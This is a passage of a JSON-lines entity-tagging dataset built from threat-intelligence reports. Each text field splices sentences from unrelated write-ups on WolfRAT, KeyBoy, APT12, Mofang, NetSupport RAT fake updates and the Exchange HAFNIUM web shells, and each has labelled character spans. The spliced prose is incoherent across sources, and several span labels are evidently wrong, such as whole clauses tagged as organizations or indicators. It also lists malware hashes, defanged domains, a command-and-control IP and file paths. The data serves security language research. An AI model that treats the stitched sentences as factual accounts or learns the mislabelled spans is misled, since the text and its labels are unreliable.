"end": 520, "label": "Indicator"}, {"start": 526, "end": 536, "label": "Organization"}]} {"text": "WolfRAT is a specifically targeted RAT which we assess to be aimed at Thai individuals and , based on previous work from Wolf Research , most likely used as an intelligence-gathering tool or interception tool . On June 7 , 2013 , Rapid7 released an analysis of malware dubbed ' KeyBoy ' , also exploiting unknown vulnerabilities in Microsoft Office , similarly patched by MS12-060 , but allegedly targeting interests in Vietnam and India . 
FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset . We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 121, "end": 136, "label": "Organization"}, {"start": 230, "end": 236, "label": "Organization"}, {"start": 278, "end": 284, "label": "System"}, {"start": 372, "end": 380, "label": "System"}, {"start": 440, "end": 447, "label": "Organization"}, {"start": 473, "end": 480, "label": "Malware"}, {"start": 484, "end": 492, "label": "Malware"}, {"start": 563, "end": 568, "label": "Organization"}, {"start": 641, "end": 649, "label": "Organization"}, {"start": 662, "end": 670, "label": "Organization"}, {"start": 679, "end": 691, "label": "Organization"}]} {"text": "This can be packaged and \" sold '' in many different ways to customers . As we have seen in some previous targeted malware attacks , the attackers in this incident are taking advantage of services like changeip.com to establish free subdomains in their infrastructure . These development efforts may have resulted in the emergence of the WATERSPOUT backdoor . The tactics , techniques and procedures ( TTPs ) are very similar to those of SocGholish and it would be easy to think the two are related .", "spans": [{"start": 338, "end": 357, "label": "Malware"}, {"start": 360, "end": 434, "label": "Indicator"}, {"start": 438, "end": 448, "label": "Organization"}]} {"text": "A \" Tracking tool '' or an \" Admin tool '' are often cited for these kinds of tools for \" commercial '' or \" enterprise '' usage . Blending in with legitimate traffic is a common tactic used by attackers to help fly under the radar . Though public disclosures resulted in APT12 adaptations , FireEye observed only a brief pause in APT12 activity before the threat actors returned to normal activity levels . 
In fact , this chain also leads to NetSupport RAT .", "spans": [{"start": 148, "end": 166, "label": "System"}, {"start": 272, "end": 277, "label": "Organization"}, {"start": 292, "end": 299, "label": "Organization"}, {"start": 331, "end": 336, "label": "Organization"}, {"start": 443, "end": 457, "label": "System"}]} {"text": "Wolf Research claimed to shut down their operations but we clearly see that their previous work continues under another guise . Subdomains at phmail.us have been linked to malicious activity dating back as far as December 2011 . Similarly , the public disclosure of APT12 \u2019s intrusion at the New York Times also led to only a brief pause in the threat group \u2019s activity and immediate changes in TTPs . However , the template source code is quite different and the payload delivery uses different infrastructure .", "spans": [{"start": 266, "end": 271, "label": "Organization"}, {"start": 292, "end": 306, "label": "Organization"}, {"start": 412, "end": 510, "label": "Indicator"}]} {"text": "The ability to carry out these types of intelligence-gathering activities on phones represents a huge score for the operator . Based on the patterns of subdomain registration over time in DNS , TRAC believes this is an example where the attackers registered their own second-level domain . The pause and retooling by APT12 was covered in the Mandiant 2014 M-Trends report . As a result , we decided to call this variant FakeSG .", "spans": [{"start": 194, "end": 198, "label": "Organization"}, {"start": 317, "end": 322, "label": "Organization"}, {"start": 342, "end": 350, "label": "Organization"}, {"start": 356, "end": 364, "label": "Organization"}, {"start": 420, "end": 426, "label": "Organization"}]} {"text": "The chat details , WhatsApp records , messengers and SMSs of the world carry some sensitive information which people often forget when communicating with their devices . 
In this blog post we'll analyze two specific incidents apparently targeting victims in Vietnam and in India and we'll describe the capabilities of the custom backdoor being used that for convenience ( and to our knowledge , for a lack of an existing name ) we call KeyBoy , due to a string present in one of the samples . Currently , APT12 continues to target organizations and conduct cyber operations using its new tools . 2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": [{"start": 19, "end": 27, "label": "System"}, {"start": 328, "end": 336, "label": "System"}, {"start": 435, "end": 441, "label": "System"}, {"start": 504, "end": 509, "label": "Organization"}, {"start": 631, "end": 644, "label": "Organization"}]} {"text": "We see WolfRAT specifically targeting a highly popular encrypted chat app in Asia , Line , which suggests that even a careful user with some awareness around end-to-end encryption chats would still be at the mercy of WolfRAT and it 's prying eyes . We encountered the first document exploit called \" THAM luan - GD - NCKH2.doc \" a few days ago , which appears to be leveraging some vulnerabilities patched with MS12-060 . Most recently , FireEye observed HIGHTIDE at multiple Taiwan-based organizations and the suspected APT12 WATERSPOUT backdoor at a Japan-based electronics company . 
On June 22 , @AnFam17 spotted the same fake browser update leveraging URL shortcuts .", "spans": [{"start": 7, "end": 14, "label": "Malware"}, {"start": 84, "end": 88, "label": "System"}, {"start": 217, "end": 224, "label": "Malware"}, {"start": 300, "end": 316, "label": "Malware"}, {"start": 317, "end": 326, "label": "Malware"}, {"start": 411, "end": 419, "label": "System"}, {"start": 438, "end": 445, "label": "Organization"}, {"start": 455, "end": 463, "label": "Malware"}, {"start": 521, "end": 526, "label": "Organization"}, {"start": 527, "end": 546, "label": "Malware"}, {"start": 599, "end": 607, "label": "Organization"}]} {"text": "IOCS Hashes 139edb1bc033725539b117f50786f3d3362ed45845c57fe1f82e7ed72b044367 e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 e5f346d8f312cc1f93c2c6af611e2f50805c528934786ea173cabc6a39b14cda This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics . APT12 . 
Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": [{"start": 12, "end": 76, "label": "Indicator"}, {"start": 77, "end": 141, "label": "Indicator"}, {"start": 142, "end": 206, "label": "Indicator"}, {"start": 207, "end": 271, "label": "Indicator"}, {"start": 277, "end": 285, "label": "Malware"}, {"start": 326, "end": 365, "label": "Malware"}, {"start": 415, "end": 420, "label": "Organization"}, {"start": 437, "end": 446, "label": "Organization"}, {"start": 447, "end": 530, "label": "Indicator"}, {"start": 537, "end": 550, "label": "System"}, {"start": 562, "end": 576, "label": "Malware"}]} {"text": "1849a50a6ac9b3eec51492745eeb14765fe2e78488d476b0336d8e41c2c581d4 d328fca14c4340fcd4a15e47562a436085e6b1bb5376b5ebd83d3e7218db64e7 59b9809dba857c5969f23f460a2bf0a337a71622a79671066675ec0acf89c810 120474682ea439eb0b28274c495d9610a73d892a4b8feeff268c670570db97e2 For the sake of this analysis we'll take the Vietnamese backdoor as an example ; the one found in the Indian attack operates in the exact same way . The attackers behind the breach of the New York Times \u2019 computer network late last year appear to be mounting fresh assaults that leverage new and improved versions of malware . 
RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 305, "end": 324, "label": "System"}, {"start": 448, "end": 462, "label": "Organization"}, {"start": 587, "end": 599, "label": "Organization"}, {"start": 645, "end": 658, "label": "Organization"}]} {"text": "ed234e61849dcb95223676abe2312e1378d6130c0b00851d82cda545b946ec83 27410d4019251a70d38f0635277f931fb73f67ac9f2e1f3b475ce680ebfde12a 6e6c210535b414c5aa2dd9e67f5153feeb43a8ac8126d8e249e768f501323a3e 4a32ced20df7001da7d29edc31ca76e13eef0c9b355f62c44888853435e9794f In the second set they are making use of a dynamic DNS service by ChangeIP.com . The new campaigns mark the first significant stirrings from the group since it went silent in January in the wake of a detailed expose of the group and its exploits \u2014 and a retooling of what security researchers believe is a massive spying operation based in China . FakeSG has different browser templates depending on which browser the victim is running .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 303, "end": 322, "label": "System"}, {"start": 608, "end": 614, "label": "Organization"}, {"start": 615, "end": 695, "label": "Indicator"}]} {"text": "ac5abaebd9f516b8b389450f7d27649801d746fb14963b848f9d6dad0a505e66 3a45d7a16937d4108b5b48f44d72bb319be645cbe15f003dc9e77fd52f45c065 Domains cvcws [ . The Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . The newest campaign uses updated versions of Aumlib and Ixeshe . 
The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 138, "end": 147, "label": "Indicator"}, {"start": 152, "end": 169, "label": "Organization"}, {"start": 239, "end": 246, "label": "System"}, {"start": 346, "end": 352, "label": "Malware"}, {"start": 357, "end": 363, "label": "Malware"}, {"start": 445, "end": 455, "label": "Organization"}]} {"text": "] ponethus [ . he Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . Aumlib , which for years has been used in targeted attacks , now encodes certain HTTP communications . Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": [{"start": 18, "end": 35, "label": "Organization"}, {"start": 105, "end": 112, "label": "System"}, {"start": 167, "end": 173, "label": "Malware"}, {"start": 248, "end": 252, "label": "Indicator"}, {"start": 293, "end": 331, "label": "Organization"}]} {"text": "] com svc [ . They are often targeted simultaneously with other ethnic minorities and religious groups in China . FireEye researchers spotted the malware when analyzing a recent attempted attack on an organization involved in shaping economic policy . 
The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": [{"start": 6, "end": 13, "label": "Indicator"}, {"start": 64, "end": 81, "label": "Organization"}, {"start": 86, "end": 102, "label": "Organization"}, {"start": 114, "end": 121, "label": "Organization"}, {"start": 320, "end": 326, "label": "System"}, {"start": 329, "end": 353, "label": "Indicator"}, {"start": 359, "end": 364, "label": "System"}, {"start": 367, "end": 393, "label": "Indicator"}]} {"text": "] ponethus [ . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups . And a new version of Ixeshe , which has been in service since 2009 to attack targets in East Asia , uses new network traffic patterns , possibly to evade traditional network security systems . We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": [{"start": 41, "end": 57, "label": "Malware"}, {"start": 77, "end": 115, "label": "Organization"}, {"start": 144, "end": 154, "label": "Organization"}, {"start": 159, "end": 172, "label": "Organization"}, {"start": 196, "end": 202, "label": "Malware"}, {"start": 388, "end": 398, "label": "Organization"}]} {"text": "] com www [ . More recently in 2016 , Arbor Networks reported on connected malware operations continuing to target these same groups , which the Communist Party of China perceives as a threat to its power . The updates are significant for both of the longstanding malware families ; before this year , Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011 . 
There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": [{"start": 6, "end": 13, "label": "Indicator"}, {"start": 38, "end": 52, "label": "Organization"}, {"start": 302, "end": 308, "label": "Malware"}, {"start": 456, "end": 464, "label": "Organization"}, {"start": 506, "end": 520, "label": "System"}]} {"text": "] ponethus [ . There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements \u2013 developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information . Cybercriminals are constantly evolving and adapting in their attempts to bypass computer network defenses . The decoy installer ( Install%20Updater%20(V104.25.151)-stable.url ) is an Internet shortcut downloaded from another compromised WordPress site .", "spans": [{"start": 28, "end": 40, "label": "Malware"}, {"start": 61, "end": 83, "label": "Malware"}, {"start": 110, "end": 138, "label": "Malware"}, {"start": 443, "end": 487, "label": "Indicator"}, {"start": 550, "end": 564, "label": "System"}]} {"text": "] com webmail [ . For example , we have observed frequent reuse of older ( patched ) exploits in malware operations against the Tibetan community . But , larger , more successful threat actors tend to evolve at a slower rate . 
This shorcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server : This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload ( NetSupport RAT ) .", "spans": [{"start": 6, "end": 17, "label": "Indicator"}, {"start": 128, "end": 145, "label": "Organization"}, {"start": 227, "end": 317, "label": "Indicator"}, {"start": 323, "end": 338, "label": "System"}, {"start": 341, "end": 459, "label": "Malware"}, {"start": 462, "end": 476, "label": "Malware"}]} {"text": "] ponethus [ . These operations involved highly targeted email lures with repurposed content and attachments that contained an updated version of KeyBoy . As long as these actors regularly achieve their objective ( stealing sensitive data ) , they are not motivated to update or rethink their techniques , tactics , or procedures ( TTPs ) . Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": [{"start": 57, "end": 68, "label": "System"}, {"start": 146, "end": 152, "label": "System"}, {"start": 341, "end": 360, "label": "Organization"}, {"start": 422, "end": 436, "label": "Malware"}, {"start": 437, "end": 539, "label": "Indicator"}]} {"text": "] com nampriknum [ . In August and October 2016 we observed a malware operation targeting members of the Tibetan Parliament ( the highest legislative organ of the Tibetan government in exile , formally known as Central Tibetan Administration ) . These threat actors \u2019 tactics follow the same principles of evolution \u2013 successful techniques propagate , and unsuccessful ones are abandoned . 
The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": [{"start": 6, "end": 20, "label": "Indicator"}, {"start": 105, "end": 123, "label": "Organization"}, {"start": 163, "end": 181, "label": "Organization"}, {"start": 211, "end": 241, "label": "Organization"}, {"start": 432, "end": 492, "label": "Indicator"}]} {"text": "] net www [ . The Arbor report describes the ongoing use of these four vulnerabilities in a series of espionage campaigns against not only Tibetan groups , but also others related to Hong Kong , Taiwan , and Uyghur interests . Attackers do not change their approach unless an external force or environmental shift compels them to . Following a successful infection , callbacks are made to the RAT 's command and control server at 94.158.247[.]27 .", "spans": [{"start": 6, "end": 13, "label": "Indicator"}, {"start": 18, "end": 23, "label": "Organization"}, {"start": 139, "end": 153, "label": "Organization"}, {"start": 412, "end": 426, "label": "System"}, {"start": 430, "end": 445, "label": "Indicator"}]} {"text": "] nampriknum [ . The malware samples deployed in both of these operations are updated versions of the KeyBoy backdoor first discussed in 2013 by Rapid7 . As the old saying goes : If it ain\u2019t broke , don\u2019t fix it . Fake browser updates are a very common decoy used by malware authors .", "spans": [{"start": 102, "end": 117, "label": "System"}, {"start": 145, "end": 151, "label": "Organization"}, {"start": 214, "end": 234, "label": "Malware"}, {"start": 267, "end": 282, "label": "Organization"}]} {"text": "] net svc [ . This behavioural tactic was previously mentioned in relation to KeyBoy in a 2013 blog post by Cisco . So when a larger , successful threat actor changes up tactics , the move always piques our attention . 
In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": [{"start": 6, "end": 13, "label": "Indicator"}, {"start": 78, "end": 84, "label": "System"}, {"start": 108, "end": 113, "label": "Organization"}, {"start": 234, "end": 244, "label": "Organization"}, {"start": 251, "end": 264, "label": "Malware"}, {"start": 347, "end": 358, "label": "Organization"}, {"start": 367, "end": 378, "label": "System"}, {"start": 394, "end": 408, "label": "Malware"}]} {"text": "] nampriknum [ . These versions of KeyBoy differed from the one first described by Rapid7 in several ways , many of which will be described in the sections to follow . Naturally , our first priority is ensuring that we detect the new or altered TTPs . Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": [{"start": 35, "end": 41, "label": "System"}, {"start": 83, "end": 89, "label": "Organization"}, {"start": 290, "end": 304, "label": "Malware"}]} {"text": "] net svcws [ . These samples were contained in exploit documents containing distinct lure content , one having a Tibetan nexus , the other an Indian nexus . But we also attempt to figure out why the adversary changed \u2014 what broke? \u2014 so that we can predict if and when they will change again in the future . Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": [{"start": 6, "end": 15, "label": "Indicator"}, {"start": 372, "end": 388, "label": "Organization"}]} {"text": "] nampriknum [ . We believe the 2013 , 2015 , and 2016 KeyBoy samples provide evidence of a development effort focused on changing components that would be used by researchers to develop detection signatures . We observed an example of this phenomenon around May . 
While there is a very large number of vulnerable websites , we already see some that have been injected with multiple different malicious code .", "spans": [{"start": 55, "end": 69, "label": "System"}, {"start": 179, "end": 207, "label": "Malware"}]} {"text": "] net svc [ . In another modification , first observed in the most recent October 11 Parliamentarian operation ( version agewkassif ) , the developer (s ) of KeyBoy began using a string obfuscation routine in order to hide many of the critical values referenced within the malware . About four months after The New York Times publicized an attack on its network , the attackers behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families . We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": [{"start": 6, "end": 13, "label": "Indicator"}, {"start": 158, "end": 164, "label": "System"}, {"start": 179, "end": 205, "label": "System"}, {"start": 311, "end": 325, "label": "Organization"}, {"start": 434, "end": 453, "label": "Indicator"}, {"start": 458, "end": 477, "label": "Indicator"}, {"start": 559, "end": 569, "label": "Organization"}]} {"text": "] somtum [ . Trend Micro specifically noted that the 2013 versions of KeyBoy used the same algorithm for encoding their configuration files as was observed in the Operation Tropic Trooper malware . The previous versions of Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011 . Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": [{"start": 13, "end": 24, "label": "Organization"}, {"start": 70, "end": 76, "label": "System"}, {"start": 223, "end": 229, "label": "Malware"}, {"start": 329, "end": 341, "label": "Organization"}]} {"text": "] today svcws [ . 
This sample was also found to be deployed using the CVE-2012-0158 vulnerability . We cannot say for sure whether the attackers were responding to the scrutiny they received in the wake of the episode . Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": [{"start": 8, "end": 17, "label": "Indicator"}, {"start": 70, "end": 83, "label": "Vulnerability"}, {"start": 220, "end": 244, "label": "Organization"}]} {"text": "] somtum [ . The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits . But we do know the change was sudden . Beginning in January 2021 , Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment .", "spans": [{"start": 39, "end": 63, "label": "Organization"}, {"start": 97, "end": 118, "label": "Malware"}, {"start": 134, "end": 160, "label": "System"}, {"start": 230, "end": 254, "label": "Organization"}, {"start": 295, "end": 320, "label": "System"}]} {"text": "] today www [ . Chances are about even , though , that Mofang is a relevant threat actor to any organization that invests in Myanmar or is otherwise politically involved . Akin to turning a battleship , retooling TTPs of large threat actors is formidable . The observed activity included creation of web shells for persistent access , remote code execution , and reconnaissance for endpoint security solutions .", "spans": [{"start": 8, "end": 15, "label": "Indicator"}, {"start": 55, "end": 61, "label": "Organization"}, {"start": 149, "end": 160, "label": "Organization"}]} {"text": "] somtum [ . In addition to the campaign in Myanmar , Mofang has been observed to attack targets across multiple sectors ( government , military , critical infrastructure and the automotive and weapon industries ) in multiple countries . 
Such a move requires recoding malware , updating infrastructure , and possibly retraining workers on new processes . Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM , a privileged local account on the Windows operating system .", "spans": [{"start": 54, "end": 60, "label": "Organization"}, {"start": 123, "end": 133, "label": "Organization"}, {"start": 136, "end": 144, "label": "Organization"}, {"start": 147, "end": 170, "label": "Organization"}, {"start": 179, "end": 189, "label": "Organization"}, {"start": 194, "end": 211, "label": "Organization"}, {"start": 387, "end": 532, "label": "Indicator"}]} {"text": "] today somtum [ . This threat report gives insight into some of the information that Fox-IT has about a threat actor that it follows , called Mofang . The following sections detail the changes to Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe . Furthermore , the process that created the web shell was UMWorkerProcess.exe , the process responsible for Exchange Server \u2019s Unified Messaging Service .", "spans": [{"start": 8, "end": 18, "label": "Indicator"}, {"start": 86, "end": 92, "label": "Organization"}, {"start": 143, "end": 149, "label": "Organization"}, {"start": 197, "end": 216, "label": "Indicator"}, {"start": 221, "end": 240, "label": "Indicator"}, {"start": 257, "end": 319, "label": "Indicator"}, {"start": 350, "end": 394, "label": "System"}]} {"text": "] today shop [ . The name Mofang is based on the Mandarin verb , which means to imitate . Backdoor.APT.Aumlib : In subsequent investigations , we observed malicious files created by w3wp.exe , the process responsible for the Exchange Server web front - end .", "spans": [{"start": 8, "end": 16, "label": "Indicator"}, {"start": 26, "end": 32, "label": "Organization"}, {"start": 90, "end": 109, "label": "Indicator"}, {"start": 182, "end": 190, "label": "System"}]} {"text": "] databit [ . 
It is highly likely that the Mofang group is a group that operates out of China and is probably government-affiliated . A recently observed malware sample ( hash value 832f5e01be536da71d5b3f7e41938cfb ) appears to be a modified variant of Aumlib . In response to this activity , we built threat hunting campaigns designed to identify additional Exchange Server abuse .", "spans": [{"start": 43, "end": 55, "label": "Organization"}, {"start": 182, "end": 214, "label": "Indicator"}, {"start": 253, "end": 259, "label": "Malware"}, {"start": 302, "end": 326, "label": "Organization"}]} {"text": "] today svc [ . Chapter 7 explains the working of Mofang 's preferred tools : ShimRat and SimRatReporter . The sample , which was deployed against an organization involved in shaping economic policy , was downloaded from the following URL : We also utilized this data to build higher - fidelity detections of web server process chains .", "spans": [{"start": 8, "end": 15, "label": "Indicator"}, {"start": 78, "end": 85, "label": "System"}, {"start": 90, "end": 104, "label": "System"}, {"start": 309, "end": 334, "label": "Organization"}]} {"text": "] databit [ . The Mofang group has been active in relation to the Kyaukphyu sez . status.acmetoy.com /DD/ myScript.js or status.acmetoy.com /DD/ css.css . On March 2 , 2021 , Microsoft released a blog post that detailed multiple zero - day vulnerabilities used to attack on - premises versions of Microsoft Exchange Server .", "spans": [{"start": 18, "end": 30, "label": "Organization"}, {"start": 82, "end": 100, "label": "Indicator"}, {"start": 106, "end": 117, "label": "Indicator"}, {"start": 121, "end": 139, "label": "Indicator"}, {"start": 145, "end": 152, "label": "Indicator"}, {"start": 175, "end": 184, "label": "Organization"}, {"start": 220, "end": 255, "label": "Vulnerability"}, {"start": 297, "end": 322, "label": "System"}]} {"text": "] today test [ . 
KeyBoy provides basic backdoor functionality , allowing the operators to select from various capabilities used to surveil and steal information from the victim machine . This output reveals the following changes when compared with earlier variants : Microsoft also issued emergency Exchange Server updates for the following vulnerabilities : The activity reported by Microsoft aligns with our observations .", "spans": [{"start": 8, "end": 16, "label": "Indicator"}, {"start": 17, "end": 23, "label": "System"}, {"start": 90, "end": 122, "label": "Malware"}, {"start": 143, "end": 160, "label": "Malware"}, {"start": 267, "end": 276, "label": "Organization"}, {"start": 299, "end": 314, "label": "System"}, {"start": 384, "end": 393, "label": "Organization"}]} {"text": "] databit [ . The first attack started in early July with a ShimRatReporter payload . The POST URI is changed to /bbs/ search.asp ( as mentioned , earlier Aumlib variants used a POST URI of /bbs/ info.asp . ) The POST body is now encoded . FireEye currently tracks this activity in three clusters , UNC2639 , UNC2640 , and UNC2643 .", "spans": [{"start": 60, "end": 75, "label": "Malware"}, {"start": 119, "end": 129, "label": "Indicator"}, {"start": 155, "end": 161, "label": "Malware"}, {"start": 196, "end": 204, "label": "Indicator"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 299, "end": 306, "label": "Organization"}, {"start": 309, "end": 316, "label": "Organization"}, {"start": 323, "end": 330, "label": "Organization"}]} {"text": "] today www [ . Myanmar has been the target of Mofang 's attacks for years before the campaign related to the sez . These subtle changes may be enough to circumvent existing IDS signatures designed to detect older variants of the Aumlib family . 
We recommend following Microsoft \u2019s guidance and patching Exchange Server immediately to mitigate this activity .", "spans": [{"start": 8, "end": 15, "label": "Indicator"}, {"start": 47, "end": 53, "label": "Organization"}, {"start": 230, "end": 236, "label": "Malware"}]} {"text": "] databit [ . In late September 2015 Mofang used the website of Myanmar 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar . The sample 832f5e01be536da71d5b3f7e41938cfb shares code with an older Aumlib variant with the hash cb3dcde34fd9ff0e19381d99b02f9692 . Based on our telemetry , we have identified an array of affected victims including US - based retailers , local governments , a university , and an engineering firm .", "spans": [{"start": 37, "end": 43, "label": "Organization"}, {"start": 179, "end": 211, "label": "Indicator"}, {"start": 238, "end": 244, "label": "Malware"}, {"start": 267, "end": 299, "label": "Indicator"}, {"start": 385, "end": 405, "label": "Organization"}, {"start": 408, "end": 425, "label": "Organization"}, {"start": 430, "end": 440, "label": "Organization"}, {"start": 450, "end": 466, "label": "Organization"}]} {"text": "] today admin [ .databit [ .today cendata [ . In December 2012 Mofang started a campaign against a new target , called ' seg ' for the purpose of this report . The sample cb3dcde34fd9ff0e19381d99b02f9692 connected to documents.myPicture.info and www.documents.myPicture.info and as expected generated the a POST request to /bbs/ info.asp . 
Related activity may also include a Southeast Asian government and Central Asian telecom .", "spans": [{"start": 8, "end": 33, "label": "Indicator"}, {"start": 34, "end": 45, "label": "Indicator"}, {"start": 171, "end": 203, "label": "Indicator"}, {"start": 217, "end": 241, "label": "Indicator"}, {"start": 246, "end": 274, "label": "Indicator"}, {"start": 329, "end": 337, "label": "Indicator"}, {"start": 376, "end": 402, "label": "Organization"}, {"start": 407, "end": 428, "label": "Organization"}]} {"text": "] today svc [ . From the configuration it can be determined that the company was running F-Secure Antivirus and Mofang registered the domain to not appear suspicious . Backdoor.APT.Ixeshe : Microsoft reported the exploitation occurred together and is linked to a single group of actors tracked as \u201c HAFNIUM \u201d , a group that has previously targeted the US - based defense companies , law firms , infectious disease researchers , and think tanks .", "spans": [{"start": 8, "end": 15, "label": "Indicator"}, {"start": 89, "end": 107, "label": "System"}, {"start": 112, "end": 118, "label": "System"}, {"start": 168, "end": 187, "label": "Indicator"}, {"start": 190, "end": 199, "label": "Organization"}, {"start": 299, "end": 306, "label": "Organization"}, {"start": 352, "end": 380, "label": "Organization"}, {"start": 383, "end": 392, "label": "Organization"}, {"start": 395, "end": 425, "label": "Organization"}, {"start": 432, "end": 443, "label": "Organization"}]} {"text": "] cendata [ . In September 2015 Mofang launched another attack . Ixeshe has been used in targeted attacks since 2009, often against entities in East Asia . As our experience with and knowledge of this threat actor grows , we will update this post or release new technical details as appropriate .", "spans": [{"start": 32, "end": 38, "label": "Organization"}, {"start": 65, "end": 71, "label": "Malware"}, {"start": 201, "end": 213, "label": "Organization"}]} {"text": "] today svcws [ . 
A new version of ShimRat was built on the 7th of September , uploaded to the server and only days later used in a new campaign . The network traffic is encoded with a custom Base64 alphabet . For our Managed Defense Customers , we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity .", "spans": [{"start": 8, "end": 17, "label": "Indicator"}, {"start": 35, "end": 42, "label": "System"}, {"start": 218, "end": 243, "label": "Organization"}, {"start": 335, "end": 347, "label": "Organization"}]} {"text": "] cendata [ . MoneyTaker has primarily been targeting card processing systems , including the AWS CBR ( Russian Interbank System ) and purportedly SWIFT ( US ) . We analyzed a recent sample that appears to have targeted entities in Taiwan , a target consistent with previous Ixeshe activity . Beginning in January 2021 , Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer \u2019s environment .", "spans": [{"start": 275, "end": 281, "label": "Malware"}, {"start": 321, "end": 345, "label": "Organization"}, {"start": 355, "end": 459, "label": "Indicator"}]} {"text": "] today www [ . Given the wide usage of STAR in LATAM , financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group . This sample ( aa873ed803ca800ce92a39d9a683c644 ) exhibited network traffic that does not match the earlier pattern and therefore may evade existing network traffic signatures designed to detect Ixeshe related infections . 
The web shell , named help.aspx ( MD5 : 4b3039cf227c611c45d2242d1228a121 ) , contained code to identify the presence of ( 1 ) FireEye xAgent , ( 2 ) CarbonBlack , or ( 3 ) CrowdStrike Falcon endpoint products and write the output of discovery .", "spans": [{"start": 8, "end": 15, "label": "Indicator"}, {"start": 56, "end": 78, "label": "Organization"}, {"start": 152, "end": 168, "label": "Organization"}, {"start": 185, "end": 217, "label": "Indicator"}, {"start": 365, "end": 371, "label": "Malware"}, {"start": 393, "end": 424, "label": "Indicator"}, {"start": 427, "end": 465, "label": "Indicator"}, {"start": 470, "end": 512, "label": "Indicator"}, {"start": 519, "end": 533, "label": "Organization"}, {"start": 542, "end": 553, "label": "Organization"}, {"start": 565, "end": 583, "label": "Organization"}]} {"text": "] cendata [ . In addition to banks , the MoneyTaker group has attacked law firms and also financial software vendors . APT16 . The web shell was written to the system by the UMWorkerProcess.exe process , which is associated with Microsoft Exchange Server \u2019s Unified Messaging service .", "spans": [{"start": 29, "end": 34, "label": "Organization"}, {"start": 41, "end": 57, "label": "Organization"}, {"start": 71, "end": 80, "label": "Organization"}, {"start": 119, "end": 124, "label": "Organization"}, {"start": 229, "end": 283, "label": "System"}]} {"text": "] today PHA Family Highlights : Zen and its cousins January 11 , 2019 Google Play Protect detects Potentially Harmful Applications ( PHAs ) which Google Play Protect defines as any mobile app that poses a potential security risk to users or to user data\u2014commonly referred to as \" malware . Since that time , the group attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida . 
